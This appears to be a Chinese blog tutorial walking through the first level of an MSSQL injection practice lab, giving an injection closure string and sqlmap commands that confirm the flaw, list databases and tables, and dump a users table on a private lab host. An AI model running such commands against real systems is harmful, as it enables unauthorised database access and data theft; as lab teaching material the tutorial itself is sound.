当前位置: 首页 > news >正文

MSSQL 工具注入(第一关)

news 2025/11/24 4:54:04

简介

     SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

 

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

 使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

 

六、得到表中的数据

使用语句  sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民


http://www.mrgr.cn/news/8561.html

相关文章:

  • 解决在移动端css使用100vh底部被遮盖的问题
  • EmguCV学习笔记 VB.Net 6.5 凸包和凸缺陷
  • 秋招力扣Hot100刷题总结——栈和队列
  • 前端宝典十六:深入浅出8大设计模式
  • 【Material-UI】Radio Group中的 Size 属性详解
  • 51单片机——按键控制
  • 如何备份电脑所有数据?四个方法实现一键备份所有数据
  • OpenGL和OpenCV区别与介绍
  • JavaScript初级——DOM增删改
  • rabbitMQ消息的可靠性
  • 昂科烧录器支持Airoha达发科技的蓝牙音频芯片AB1568
  • 使用sphinx自动提取python中的注释成为接口文档
  • 信息泄露屏蔽-配置错误页面以屏蔽敏感信息(Tomcat )
  • graphrag论文精读
  • 0.91寸OLED迷你音频频谱
  • 数学建模学习(127):基于Python的模糊最佳-最差法(Fuzzy BWM)在多准则决策中的应用
  • WPF—XAML数据绑定
  • JUC并发编程-JMM
  • RnB编曲:4Chord进行 Swing律动 音阶调式 转音 纯和声段落 主旋律和声
  • [C++] 异常详解